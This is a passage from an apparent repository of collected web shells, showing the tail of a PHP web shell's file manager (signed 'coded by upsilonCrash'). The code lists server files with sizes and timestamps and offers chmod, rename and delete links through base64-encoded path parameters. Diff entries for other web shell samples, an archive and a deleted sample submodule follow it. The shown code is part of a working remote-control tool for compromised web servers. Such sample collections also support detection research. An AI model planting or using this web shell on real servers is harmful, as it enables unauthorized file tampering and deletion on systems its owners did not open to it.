$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "ZB";
} if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
$filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
$sizeks = "YB";
}
$result = filemtime($path.$slash.$iota); $result = getdate($result);
$one = strlen($result["mday"]); $two = strlen($result["mon"]);
$three = strlen($result["year"]); $four = strlen($result["hours"]);
$five = strlen($result["minutes"]);
if ($one == "1") {
$result["mday"] = "0".$result["mday"];
} if ($two == "1") {
$result["mon"] = "0".$result["mon"];
} if ($three == "1") {
$result["year"] = "0".$result["year"];
} if ($four == "1") {
$result["hours"] = "0".$result["hours"];
} if ($five == "1") {
$result["minutes"] = "0".$result["minutes"];
} $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
<td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
<td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
<td style='width: 5%'><center><a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
<a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td></tr>";
}
}
}
}
echo "</table><hr color='Gray'><center>coded by upsilonCrash</form>";
?>

3
upsi1on/webshell/sungux/encrypt.php Normal file
View File

File diff suppressed because one or more lines are too long

BIN
xl7dev/WebShell-master.zip Normal file
View File

Binary file not shown.

1
xl7dev/webshell/other/webshell/read.me Normal file
View File

@@ -0,0 +1 @@
fix error

1
ysrc/webshell-sample

Submodule ysrc/webshell-sample deleted from dbaeee1622